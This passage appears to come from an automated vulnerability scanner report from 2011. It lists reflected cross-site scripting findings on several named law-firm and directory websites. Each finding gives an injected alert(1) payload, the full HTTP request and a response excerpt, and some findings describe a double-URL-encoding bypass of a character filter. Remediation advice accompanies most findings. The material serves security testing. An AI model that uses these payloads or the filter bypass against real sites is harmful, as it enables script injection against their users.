<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//E ...[SNIP]... <script type="text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&86470"-alert(1)-"c4c00aee9af=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
4.111. http://www.skadden.com/index.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.skadden.com
Path: /index.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 90bb3"-alert(1)-"0eb36443031 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /index.cfm?contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1 HTTP/1.1 Host: www.skadden.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=34916643.1295449749.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); BACKLINK=; __utma=34916643.540692983.1295449749.1295449749.1295449749.1; __utmc=34916643; __utmb=34916643;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:14:54 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: BACKLINK=%2CcontentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1;expires=Fri, 11-Jan-2041 15:14:54 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUB ...[SNIP]... "text/javascript"> extra = "height="+screen.height+",width="+screen.width+",location=no"; function printWindow(){ window.open("http://www.skadden.com/PrintToPDF.cfm?print=1&contentID=42&itemID=1478&90bb3"-alert(1)-"0eb36443031=1","PDF",extra) }
function pdfWindow(url){ window.open(url,"PDF",extra); } </script> ...[SNIP]...
The value of the cc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ab29'%3balert(1)//2894fafc0c6 was submitted in the cc parameter. This input was echoed as 4ab29';alert(1)//2894fafc0c6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gypr.aspx?afid=1993&cc=54111051004ab29'%3balert(1)//2894fafc0c6&cr=3209505169&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:08 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:08 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 82130
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]... var switch_open_once_only=1; function open_once_only(){ if(switch_open_once_only){ document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=3209505169&oid=&cc=54111051004ab29';alert(1)//2894fafc0c6'; switch_open_once_only=0; } } function quicksearchform_onsubmit() { var form = document.forms.quicksearchform; var str = form.qhqn.value;
The value of the cr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5878e'%3balert(1)//136c0518b8b was submitted in the cr parameter. This input was echoed as 5878e';alert(1)//136c0518b8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gypr.aspx?afid=1993&cc=5411105100&cr=32095051695878e'%3balert(1)//136c0518b8b&ct=Washington/x22 HTTP/1.1 Host: www.usdirectory.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:19 GMT Server: Microsoft-IIS/6.0 X-UA-Compatible: IE=EmulateIE7 X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Set-Cookie: Lng=en; domain=usdirectory.com; expires=Sat, 19-Feb-2011 15:10:18 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 46986
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <m ...[SNIP]... xt/javascript"> var switch_open_once_only=1; function open_once_only(){ if(switch_open_once_only){ document.getElementById('nypr_iframe').src='ypr_iframe.aspx?afid=1993&cr=32095051695878e';alert(1)//136c0518b8b&oid=&cc=5411105100'; switch_open_once_only=0; } } function quicksearchform_onsubmit() { var form = document.forms.quicksearchform; var str = form.qhqn.value;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6c40'%3balert(1)//dba4d06d54c was submitted in the REST URL parameter 4. This input was echoed as f6c40';alert(1)//dba4d06d54c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankingsf6c40'%3balert(1)//dba4d06d54c/individual HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Wed, 19 Jan 2011 15:10:14 GMT Server: IBM_HTTP_Server IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os3gzQ0u_YHMPIwP3YBNjA09fQ2M34wBvo2BvA30v_aj0nPwkkEon_XCQdiTl_oHGLgaeBsF-vsZmpj7GPoYQeQMcwNFA388jPzdVvyA7ySDLxFERAJrt8L0!/dl3/d3/L2dBISEvZ0FBIS9nQSEh/ Cache-Control: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Pragma: no-cache Vary: User-Agent,Cookie,Accept-Encoding Set-Cookie: JSESSIONID=0000DmxfkY9YKAx1Q4mLBLNSFjN:140i3s34m; Path=/ Keep-Alive: timeout=10, max=86 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Language: en Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6e45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:12:18 GMT;path=/ Content-Length: 68250
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... ideGigyaLink:true , useHTML:true ,showWhatsThis: true ,containerID: 'loginDiv' ,redirectURL: 'http://' + window.location.hostname + '/wps/portal/usa/membership?mode=31&lastPage=/wps/portal/usa/rankingsf6c40';alert(1)//dba4d06d54c/individual' };
var conf = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin' };
var conf2 = { APIKey: 'null' ,enabledProviders: 'facebook,twitter,yahoo,linkedin,google ...[SNIP]...
4.115. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vault.com
Path: /wps/portal/usa/rankings/individual
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1411"><script>alert(1)</script>54ec8343c87 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... <a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?e1411"><script>alert(1)</script>54ec8343c87=1" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/ ...[SNIP]...
4.116. http://www.vault.com/wps/portal/usa/rankings/individual [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vault.com
Path: /wps/portal/usa/rankings/individual
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8325'-alert(1)-'adbf0a50b51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?c8325'-alert(1)-'adbf0a50b51=1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72071"><script>alert(1)</script>cbaa09597bd was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=272071"><script>alert(1)</script>cbaa09597bd&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aad31'-alert(1)-'06716bb157a was submitted in the rankingId1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2aad31'-alert(1)-'06716bb157a&rankingId2=-1&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fa29d"><script>alert(1)</script>5276a27416 was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1fa29d"><script>alert(1)</script>5276a27416&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankingId2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c3ee'-alert(1)-'98bd799206f was submitted in the rankingId2 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-17c3ee'-alert(1)-'98bd799206f&rankings=1&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankings request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47dd0"><script>alert(1)</script>38ea02e91b3 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=147dd0"><script>alert(1)</script>38ea02e91b3&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the rankings request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e5bc'-alert(1)-'f398cddff33 was submitted in the rankings parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=19e5bc'-alert(1)-'f398cddff33&regionId=0/x22 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the regionId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 631b6'-alert(1)-'bf48ddfbfb1 was submitted in the regionId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x22631b6'-alert(1)-'bf48ddfbfb1 HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the regionId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86be1"><script>alert(1)</script>fd63fd4328b was submitted in the regionId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b HTTP/1.1 Host: www.vault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <script type="text/javascript">var _sf_startpt=(new Dat ...[SNIP]... <a href="http://www.addthis.com/bookmark.php" addthis:url="http://www.vault.com/wps/portal/usa/rankings/individual?rankingId1=2&rankingId2=-1&rankings=1&regionId=0/x2286be1"><script>alert(1)</script>fd63fd4328b" addthis:title="http://www.vault.com/wps/portal/usa/rankings/individual" class="addthis_button_email" onClick="_gaq.push(['_trackEvent', 'vault.com tools', 'Email', 'http://www.vault.com/wps/portal/us ...[SNIP]...
4.125. http://www.weil.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.weil.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef2ab</script><script>alert(1)</script>803ebce93f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?ef2ab</script><script>alert(1)</script>803ebce93f8=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <!-- window["ctl00_ctl04_cmbSearch"] = new RadComboBox("cmbSearch","ctl00_ctl04_cmbSearch");window["ctl00_ctl04_cmbSearch"].Initialize({"LoadOnDemandUrl":"/sitesearchstream.aspx?ef2ab</script><script>alert(1)</script>803ebce93f8=1&rcbID=ctl00_ctl04_cmbSearch&rcbServerID=cmbSearch","OnClientSelectedIndexChanged":"SelectedIndexChanged","OnClientDropDownOpening":"HandleOpen","OnClientFocus":"GotFocus","OnClientBlur":"GotBlur","O ...[SNIP]...
4.126. http://www.weil.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.weil.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd131'-alert(1)-'83a7499dccf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cd131'-alert(1)-'83a7499dccf=1 HTTP/1.1 Host: www.weil.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html> <head> <title id="ctl00_htmlTitle">Weil, Gotshal & Man ...[SNIP]... <![CDATA[ var myForm=document.forms['aspnetForm'];if(!myForm){myForm=document.aspnetForm;}myForm.action='/'+''+'Home.aspx?cd131'-alert(1)-'83a7499dccf=1';//]]> ...[SNIP]...
4.127. http://www.wileyrein.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wileyrein.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85981"><script>alert(1)</script>038dfd0999c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?85981"><script>alert(1)</script>038dfd0999c=1 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:10:49 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: CFID=18263798;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Set-Cookie: CFTOKEN=29109429;expires=Fri, 11-Jan-2041 15:10:49 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2 was submitted in the REST URL parameter 1. This input was echoed as 490d8"><script>alert(1)</script>a3a95841ba2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css490d8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea3a95841ba2/_blog.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:21 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 was submitted in the REST URL parameter 2. This input was echoed as 1c8c9"><script>alert(1)</script>84fbe621327 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_blog.css1c8c9%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e84fbe621327 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d was submitted in the REST URL parameter 1. This input was echoed as 86d6e"><script>alert(1)</script>a6da1f2345d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css86d6e%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea6da1f2345d/_list.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 was submitted in the REST URL parameter 2. This input was echoed as d81ed"><script>alert(1)</script>da2c05f8831 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /css/_list.cssd81ed%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eda2c05f8831 HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:13:24 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b was submitted in the REST URL parameter 1. This input was echoed as bdd5f"><script>alert(1)</script>672638c3b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /cssbdd5f%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e672638c3b/_main.css HTTP/1.1 Host: www.wileyrein.com Proxy-Connection: keep-alive Referer: http://www.wileyrein.com/ Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=18263656; CFTOKEN=43582841
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 19 Jan 2011 15:12:57 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1b51%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e450c96039aa was submitted in the REST URL parameter 2. This input was echoed as f1b51"><script>alert(1)</script>450c96039aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
